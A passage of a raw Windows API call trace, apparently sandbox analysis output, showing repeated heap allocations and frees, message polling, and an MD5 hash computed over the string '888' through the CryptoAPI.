RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0150.938] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0150.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80060 | out: hHeap=0x970000) returned 1 [0150.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0150.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50758 [0150.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0150.938] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0150.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0150.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0150.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0150.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0150.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0150.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0150.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0150.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0150.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0150.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0150.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0150.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0150.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0150.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0150.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0150.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0150.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0150.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0150.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0150.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0150.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0150.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0150.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0150.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0150.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0150.939] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0150.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0150.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0150.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50a88 [0150.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0150.939] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0150.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0150.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0150.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0150.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0150.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0150.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0150.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0150.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0150.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0150.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0150.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0150.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0150.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0150.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0150.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0150.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0150.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0150.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0150.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0150.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0150.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0150.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0150.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0150.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0150.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0150.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0150.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0150.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0150.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0150.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0150.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0150.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0150.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0150.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0150.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0150.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0150.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0150.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0150.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0150.941] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0150.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0150.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0150.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0150.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0150.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0150.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0150.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0150.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0150.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0150.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0150.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0150.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0150.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0150.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0150.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0150.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0150.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0150.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0150.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0150.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0150.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0150.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0150.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0150.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0150.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0150.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0150.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0150.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0150.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0150.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0150.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0150.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0150.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0150.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0150.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0150.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0150.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0150.942] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0150.942] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e50b60, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0150.942] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0150.943] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.943] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.943] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.943] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.943] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0150.943] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54e68, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0150.943] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0150.943] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.943] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0150.943] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54eb8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0150.943] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.943] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0150.943] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0150.943] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0150.943] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0150.943] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e50a58, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0150.943] CryptHashData (hHash=0xa875d0, pbData=0x2e54d98, dwDataLen=0x3, dwFlags=0x1) returned 1 [0150.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0150.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0150.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0150.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0150.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0150.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0150.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0150.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0150.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0150.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0150.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0150.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0150.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0150.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0150.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0150.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0150.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0150.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0150.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0150.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0150.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0150.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0150.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0150.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0150.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a48 [0150.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c68 [0150.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0150.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0150.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0150.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0150.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0150.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0150.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0150.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0150.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0150.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0150.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0150.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0150.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0150.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0150.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0150.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0150.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0150.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0150.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0150.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0150.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0150.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0150.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0150.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0150.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0150.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0150.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0150.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0150.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0150.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0150.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0150.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0150.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0150.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0150.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0150.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c08 | out: hHeap=0x970000) returned 1 [0150.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0150.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0150.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0150.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0150.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0150.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0150.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0150.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0150.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0150.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0150.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0150.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0150.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0150.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0150.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0150.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0150.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0150.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0150.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0150.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0150.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0150.946] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0150.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0150.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0150.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0150.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0150.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0150.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0150.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0150.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: 